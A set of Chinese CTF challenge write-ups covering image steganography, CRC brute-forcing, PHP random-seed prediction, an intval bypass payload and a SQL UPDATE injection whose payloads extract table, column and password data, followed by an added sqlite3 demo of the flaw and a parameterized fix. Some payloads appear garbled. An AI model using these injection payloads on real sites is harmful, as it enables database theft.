[SWPUCTF 2022 Freshman Contest]Capture!
Problem: [SWPUCTF 2022 Freshman Contest]Capture!
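Modify the image height to get part1.
Then run a one-shot LSB steganography scan:
zsteg -a flag.png  # try every detection method in one go
The result looked like base64, but decoding it yielded nothing.
Reversing the order then decodes it.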
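[SWPUCTF 2022 Freshman Contest]Cycle Again
Problem: [SWPUCTF 2022 Freshman Contest]Cycle Again
First open the image in 010 Editor: the width and height are zero, which tells us this is a CRC brute-force challenge.
Then brute-force the CRC with a script: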
import binascii
import struct

# \x49\x48\x44\x52\x00\x00\x01\x00\x00\x00\x00\x00\x08\x02\x00\x00\x00
crc32key = 0x6bb7ad9c  # target CRC32 of the IHDR chunk
for i in range(0, 65535):       # candidate height
    for j in range(0, 5000):    # candidate width
        width = struct.pack('>i', j)
        height = struct.pack('>i', i)
        # chunk type "IHDR" + width + height + remaining IHDR fields
        data = b'\x49\x48\x44\x52' + width + height + b'\x08\x06\x00\x00\x00'
        crc32result = binascii.crc32(data) & 0xffffffff
        if crc32result == crc32key:
            # print the matching width and height as hex
            print(''.join(map(lambda c: "%02X" % c, width)))
            print(''.join(map(lambda c: "%02X" % c, height)))
output:
00000800
00000480
This gives part1.
Then a CRC brute-force against the archive yields part2.
[SWPUCTF 2022 Freshman Contest]Coffee Please
Unzip the document.
Search it with VS Code.
That gives the flag:
NSSCTF{8ff8a53a-9378-4e78-b54a-ef86e8c84432}
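Problem: [SWPUCTF 2022 Freshman Contest]Convert Something
[SWPUCTF 2022 Freshman Contest]Convert Something
Zero-width steganography + base64 steganography
Zero-width steganography
Website
base64 steganography script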
import base64

def get_base64_diff_value(s1, s2):
    # Distance between the first pair of differing base64 characters,
    # i.e. the value hidden in the unused bits of the last character.
    base64chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
    res = 0
    for i in range(len(s1)):
        if s1[i] != s2[i]:
            return abs(base64chars.index(s1[i]) - base64chars.index(s2[i]))
    return res

def solve_stego():
    with open(r'.\字频统计.txt', 'rb') as f:
        file_lines = f.readlines()
    bin_str = ''
    for line in file_lines:
        # strip() handles both \r\n and \n line endings
        steg_line = line.decode().strip()
        # canonical encoding of the same payload, for comparison
        norm_line = base64.b64encode(base64.b64decode(line)).decode()
        diff = get_base64_diff_value(steg_line, norm_line)
        pads_num = steg_line.count('=')
        # each '=' of padding carries two hidden bits
        if diff:
            bin_str += bin(diff)[2:].zfill(pads_num * 2)
        else:
            bin_str += '0' * pads_num * 2
    print(bin_str)
    res_str = ''
    for i in range(0, len(bin_str), 8):
        res_str += chr(int(bin_str[i:i+8], 2))
    print(res_str)

if __name__ == '__main__':
    solve_stego()
[SWPUCTF 2022 Freshman Contest]Does your nc work?
A sign-in challenge: connect with nc. Just make sure not to connect from Windows.
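[SWPUCTF 2022 Freshman Contest]funny_web
Problem: [SWPUCTF 2022 Freshman Contest]funny_web
Account: NSS
Password: 2122693401
The intval() function converts a string to an integer; it can convert hexadecimal to decimal, which can be used to bypass numeric filters.
The intval() check can be bypassed by means of string concatenation.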
payload:?num=12345a
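[GWCTF 2019]Boring Lottery (枯燥的抽奖)
PHP random number prediction
Use php_mt_seed.
First view the page source to find /check, which reveals the generation logic. A quick analysis shows what the first few generated characters are. Then produce input in the format php_mt_seed recognizes, match_min match_max 0 range_max, and finally generate the result with an online site.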
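str1 = "TWKZDu268g"
key = "abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"
finall = ""
for i in str1:
    # index of the observed character in the alphabet = the random output
    num = key.index(i)
    # php_mt_seed format: match_min match_max range_min range_max
    finall += (str(num) + " ") * 2 + '0' + " " + str(len(key) - 1) + " "
print(finall)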
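Then just run it on an online site; the required version is PHP 7.1.0+.
[HUBUCTF 2022 Freshman Contest]ezsql
This challenge tests UPDATE injection. First register an account and open the profile-editing page; capturing the request shows that an update operation is performed here.
From this we can guess that the backend uses an UPDATE statement. Next, scan the directories,
which reveals a source code leak.
The injectable statement: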
update users set age=$_POST[age],nickname='$_POST[nickname]',description='$_POST[description]' where id=$_SESSION[id];
Inject to get the database:
nickname=%27+or+%3D1%3D11#&age=111,description=(select+database())#&description=(select+group_concat(password)users)%23&token=6344aa21324c599047073b593793ee61
The database name is displayed in description.
tables
nickname=%27+or+%3D1%3D11#&age=111,description=(select+group_concat(table_name)+from+information_schema.tables+where+table_schema=database())#&description=(select+group_concat(password)users)%23&token=6344aa21324c599047073b593793ee61
columns
nickname=%27+or+%3D1%3D11#&age=111,description=(select+group_concat(column_name)+from+information_schema.columns+where+table_schema=database()+and+table_name=0x7573657273)#&description=(select+group_concat(password)users)%23&token=6344aa21324c599047073b593793ee61
users
It must be changed to its hexadecimal form, 0x7573657273.
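The leaked statement splices `age` into the SQL text unquoted, which is why a value placed in that field can assign other columns. As an added example (not from the original writeup or the challenge source), the same statement shape is reproduced below with Python's sqlite3 beside a parameterized version. The in-memory table, sample rows and function names are constructed, and because SQLite is assumed in place of the challenge's backend, the comment marker is `--` rather than `#`.

```python
import sqlite3

def make_db():
    """Constructed in-memory stand-in for the challenge's users table."""
    db = sqlite3.connect(":memory:")
    db.execute("create table users (id integer primary key, age integer,"
               " nickname text, description text, password text)")
    db.executemany("insert into users values (?,?,?,?,?)", [
        (1, 30, "admin", "site owner", "admin-secret-hash"),
        (2, 20, "guest", "hello", "guest-hash"),
    ])
    return db

def update_vulnerable(db, uid, form):
    # Same shape as the leaked statement: request fields are pasted into the SQL text.
    sql = ("update users set age=%s,nickname='%s',description='%s' where id=%d"
           % (form["age"], form["nickname"], form["description"], uid))
    db.execute(sql)

def update_safe(db, uid, form):
    # Validate the numeric field, then bind every value as a parameter.
    age = int(form["age"])  # ValueError for anything that is not an integer
    db.execute("update users set age=?, nickname=?, description=? where id=?",
               (age, form["nickname"], form["description"], uid))

def description_of(db, uid):
    return db.execute("select description from users where id=?",
                      (uid,)).fetchone()[0]

# Constructed request body: the age field carries an extra assignment and a comment.
EVIL_FORM = {
    "age": "111,description=(select group_concat(password) from users)--",
    "nickname": "n",
    "description": "d",
}

if __name__ == "__main__":
    db = make_db()
    update_vulnerable(db, 2, EVIL_FORM)
    print("vulnerable:", description_of(db, 2))  # other rows' data lands in the profile
    db = make_db()
    try:
        update_safe(db, 2, EVIL_FORM)
    except ValueError as exc:
        print("safe: rejected,", exc)
    print("safe:", description_of(db, 2))
```

With bound parameters a quote or comment marker in `nickname` or `description` is stored as literal text, and the integer check rejects the `age` value before any SQL runs.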